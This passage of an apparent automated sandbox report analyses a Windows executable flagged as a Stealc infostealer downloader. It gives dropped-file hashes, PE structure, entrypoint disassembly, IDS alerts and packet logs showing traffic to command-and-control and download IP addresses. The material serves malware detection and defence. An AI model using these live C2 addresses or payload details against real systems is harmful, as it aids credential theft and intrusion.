                                                                                Preview:MDMP..a..... ........".g............4...............<............*..........T.......8...........T...........(3..........................................................................................................eJ......H.......GenuineIntel............T.......@....".g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAFF.tmp.WERInternalMetadata.xml

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8314
                                                                                Entropy (8bit):3.6946176089572615
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJ9G6ZndU6Yni6sgmf3ipDQ89bbnsf0xJm:R6lXJs6Zn+6Yi6sgmf3Cbsfb
                                                                                MD5:9F581135A5B7E48D9540646C158FB514
                                                                                SHA1:08EAB1ED1FF53CFB18D28375E8E30B186217D2EA
                                                                                SHA-256:68E41EEEE680BAC3607A115EF5F7CDF296B4C845604EB7F861D8383220E615B8
                                                                                SHA-512:E006ED25B7685AF3D595E926102CEC70F27253DE74F8B3733A7192F2E84BDE0D05351700FA6E2804A35F16A82784CFD86B911CE358181C85D1BECA8998420196
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB2F.tmp.xml

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4565
                                                                                Entropy (8bit):4.445985306585534
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zspJg77aI98YSWpW8VYGYm8M4JtGF6+q8iQ8kY/ad:uIjf7I7CYz7VqJTYA/ad
                                                                                MD5:B0817611B7B570CFA26C4CFDDB122458
                                                                                SHA1:FFE5107E805FE0F18A84C36BC8B2F7E3ADDCC033
                                                                                SHA-256:2B341DF5633E0787D0D09E219B63702113E63285D9066E5C693AECD6F2ABB75B
                                                                                SHA-512:41C3264B71CFA3E94EE57A39EE9E625572A76C3269B27FBE5DD607FD505891C811E90731E9342470DCBCA1519FD0747BF49E5C13A33D51ECDFD60799AD1ADC87
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560651" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):402432
                                                                                Entropy (8bit):6.631084505190823
                                                                                Encrypted:false
                                                                                SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                                                MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                                                SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                                                SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                                                SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):402432
                                                                                Entropy (8bit):6.631084505190823
                                                                                Encrypted:false
                                                                                SSDEEP:6144:r62/aT+zPGv8YxsI111cAz/LslwcxJm4tEyUonhvxFo:KT+zGvxNcAPCwGJptEyUg5
                                                                                MD5:8107C38AF897D81AA4BFE8CE9CA8407C
                                                                                SHA1:75F7B1895BD97B6CFCB9AA0C5E83DE9FB424CBB0
                                                                                SHA-256:5AC2F02DAE8B85F730B17D9D8C2CB51DFDB7046713C65AE72B0CF47E16A1C9A5
                                                                                SHA-512:1B4A0DF730AE0912CF3CF18E1210644D3EA804B5F0569997284F04CEDFDAB86075C7BA41313ED83F9B998F7ACE6BBF50CBCA052849AEE73400592951B4D3992A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...../f.....................8....................@...........................&.....[8..........................................<....................................................................................................................text............................... ..`.rdata...%.......&..................@..@.data...x........L..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.465483530354323
                                                                                Encrypted:false
                                                                                SSDEEP:6144:DIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSb7:UXD94+WlLZMM6YFH2+7
                                                                                MD5:CEF0AB6A7C0475C1F1A571BF68781F00
                                                                                SHA1:74367225A1F161A20F3D88EA20E150CA18C2CEF8
                                                                                SHA-256:2FC940B8C19CB7D644DBA575854CC85CCE5CE9D4D2E06373E827A16AEC60E997
                                                                                SHA-512:F666AEA9D6E78CE991DE24418E41890D9722A7D6843A4F0A4BB2F66012DD4D040D74487FC9855E450C2CA8D86682A80BD25C0085EC902B585E91C620E5E04C71
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz$..'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.976895712780285
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                • InstallShield setup (43055/19) 0.43%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:TP77MvSzt2.exe
                                                                                File size:466'944 bytes
                                                                                MD5:1e1e32d1eedb37a1e3c1ad488621b26f
                                                                                SHA1:3896ddcb3211b9412fac2490687bdc0c1d609cc1
                                                                                SHA256:c5fd02988cb7a5430c4542227ccc37e121f586ee671060f1428262af5477c319
                                                                                SHA512:ef7a425f3f32ded6f85914e955a30dd592303d659be776d25dfec6e9abd16d744b4cc4defdb39b29049be49e3f55aa3d226d27825b40971b68f0cb0fdba7acb5
                                                                                SSDEEP:6144:eL54ENEIRSlujmOaY/8qXPxQeYTXxMionfhO6Mo:emEN7SlPY//XvumiU
                                                                                TLSH:74A49D2161F16916EE776B314E3B96ECE66FBC12EE3C565DA1143E0F09733B18622702
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.c.U.0.U.0.U.0E.@0.U.0..R0.U.0..C0.U.0..U0.U.0...0.U.0.U.0.U.0..\0.U.0..B0.U.0..G0.U.0Rich.U.0........................PE..L..

                                                                                File Icon

                                                                                Icon Hash:46c7c30b0f4e0d99

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x40171e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x659105B1 [Sun Dec 31 06:09:53 2023 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:9eb5b29baf071d2c96e57b7e9a18e804

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                call 00007F2CF4FAEB3Eh
                                                                                jmp 00007F2CF4FAB61Eh
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 00000328h
                                                                                mov dword ptr [00450480h], eax
                                                                                mov dword ptr [0045047Ch], ecx
                                                                                mov dword ptr [00450478h], edx
                                                                                mov dword ptr [00450474h], ebx
                                                                                mov dword ptr [00450470h], esi
                                                                                mov dword ptr [0045046Ch], edi
                                                                                mov word ptr [00450498h], ss
                                                                                mov word ptr [0045048Ch], cs
                                                                                mov word ptr [00450468h], ds
                                                                                mov word ptr [00450464h], es
                                                                                mov word ptr [00450460h], fs
                                                                                mov word ptr [0045045Ch], gs
                                                                                pushfd
                                                                                pop dword ptr [00450490h]
                                                                                mov eax, dword ptr [ebp+00h]
                                                                                mov dword ptr [00450484h], eax
                                                                                mov eax, dword ptr [ebp+04h]
                                                                                mov dword ptr [00450488h], eax
                                                                                lea eax, dword ptr [ebp+08h]
                                                                                mov dword ptr [00450494h], eax
                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                mov dword ptr [004503D0h], 00010001h
                                                                                mov eax, dword ptr [00450488h]
                                                                                mov dword ptr [00450384h], eax
                                                                                mov dword ptr [00450378h], C0000409h
                                                                                mov dword ptr [0045037Ch], 00000001h
                                                                                mov eax, dword ptr [0044F004h]
                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                mov eax, dword ptr [0044F008h]
                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                call dword ptr [000000ECh]

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [C++] VS2008 build 21022
                                                                                • [ASM] VS2008 build 21022
                                                                                • [ C ] VS2008 build 21022
                                                                                • [IMP] VS2005 build 50727
                                                                                • [RES] VS2008 build 21022
                                                                                • [LNK] VS2008 build 21022

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4db5c0x3c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x27560000x20570.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4d7200x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x4c0000x1b0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x4a2400x4a4002d1157276e3340c143a17370f1ec5df8False0.8783505629208754data7.6648823522119836IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x4c0000x25220x260047e1827876a4808bbc1f593829a8b4caFalse0.37664473684210525data5.4418142455755465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x4f0000x270117c0x140071e359b618477ba3f80481f9a387c38cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .sohumi0x27510000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x27560000x205700x2060049c78165715957bff58d4582683b0712False0.4798503861003861data5.409133270486441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_CURSOR0x276e6600x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                RT_CURSOR0x276e7900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                RT_ICON0x2756b100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                                                                RT_ICON0x27579b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                                                                RT_ICON0x27582600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                                                                RT_ICON0x27589280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                                                                RT_ICON0x2758e900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                                                                RT_ICON0x275b4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                                                                RT_ICON0x275c4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                                                                RT_ICON0x275ce680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                                                                RT_ICON0x275d3480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                                                                RT_ICON0x275e1f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                                                                RT_ICON0x275ea980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                                                                RT_ICON0x275f1600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                                                                RT_ICON0x275f6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                                                                RT_ICON0x2761c700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                                                                RT_ICON0x2762d180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                                                                RT_ICON0x27636a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                                                                RT_ICON0x2763b800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                                                                RT_ICON0x2764a280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                                                                RT_ICON0x27652d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                                                                RT_ICON0x27659980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                                                                RT_ICON0x2765f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                                                                RT_ICON0x2766fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                                                                RT_ICON0x27679300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                                                                RT_ICON0x2767e000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.8275586353944563
                                                                                RT_ICON0x2768ca80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.8664259927797834
                                                                                RT_ICON0x27695500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7793778801843319
                                                                                RT_ICON0x2769c180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7521676300578035
                                                                                RT_ICON0x276a1800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.8062240663900415
                                                                                RT_ICON0x276c7280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.8341932457786116
                                                                                RT_ICON0x276d7d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.8434426229508196
                                                                                RT_ICON0x276e1580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8634751773049646
                                                                                RT_STRING0x2770f100x9adata0.6038961038961039
                                                                                RT_STRING0x2770fb00x6dadata0.4264538198403649
                                                                                RT_STRING0x27716900x4aadata0.4455611390284757
                                                                                RT_STRING0x2771b400x4dcdata0.4429260450160772
                                                                                RT_STRING0x27720200x7d4data0.41966067864271456
                                                                                RT_STRING0x27727f80x718data0.42841409691629956
                                                                                RT_STRING0x2772f100x696data0.4359430604982206
                                                                                RT_STRING0x27735a80x616data0.43902439024390244
                                                                                RT_STRING0x2773bc00x7dedata0.41807348560079444
                                                                                RT_STRING0x27743a00x5c6data0.4370771312584574
                                                                                RT_STRING0x27749680x5d8data0.44385026737967914
                                                                                RT_STRING0x2774f400x588data0.4392655367231638
                                                                                RT_STRING0x27754c80x616data0.43838254172015406
                                                                                RT_STRING0x2775ae00x4eedata0.4548335974643423
                                                                                RT_STRING0x2775fd00x5a0data0.4354166666666667
                                                                                RT_ACCELERATOR0x276e6380x28data1.025
                                                                                RT_GROUP_CURSOR0x2770d380x22data1.0588235294117647
                                                                                RT_GROUP_ICON0x276e5c00x76dataTurkishTurkey0.6694915254237288
                                                                                RT_GROUP_ICON0x275d2d00x76dataTurkishTurkey0.6610169491525424
                                                                                RT_GROUP_ICON0x2767d980x68dataTurkishTurkey0.7211538461538461
                                                                                RT_GROUP_ICON0x2763b080x76dataTurkishTurkey0.6694915254237288
                                                                                RT_VERSION0x2770d600x1b0data0.5856481481481481

                                                                                Imports

                                                                                DLLImport
                                                                                KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                                                                WINHTTP.dllWinHttpOpenRequest

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                TurkishTurkey

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-26T19:08:22.376374+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730104.21.56.70443TCP
                                                                                2024-10-26T19:08:23.474770+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731176.113.115.3780TCP
                                                                                2024-10-26T19:08:34.605219+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973262.204.41.17780TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 26, 2024 19:08:20.502803087 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:20.502835989 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:20.503516912 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:20.537765980 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:20.537795067 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:21.168736935 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:21.168836117 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:21.954703093 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:21.954725981 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:21.955147028 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:21.955209017 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:21.968223095 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.011343002 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:22.376399994 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:22.376485109 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.376499891 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:22.376522064 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:22.376547098 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.376569986 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.378245115 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.378264904 CEST44349730104.21.56.70192.168.2.4
                                                                                Oct 26, 2024 19:08:22.378282070 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.378313065 CEST49730443192.168.2.4104.21.56.70
                                                                                Oct 26, 2024 19:08:22.559617043 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:22.564971924 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:22.565176964 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:22.565295935 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:22.570615053 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474637032 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474653959 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474667072 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474680901 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474709034 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474720001 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474730968 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474742889 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474761009 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474770069 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.474818945 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.474844933 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.474888086 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.480191946 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.480209112 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.480221033 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.480237007 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.480273962 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.480309010 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.621014118 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:23.621083021 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:23.621087074 CEST8049731176.113.115.37192.168.2.4
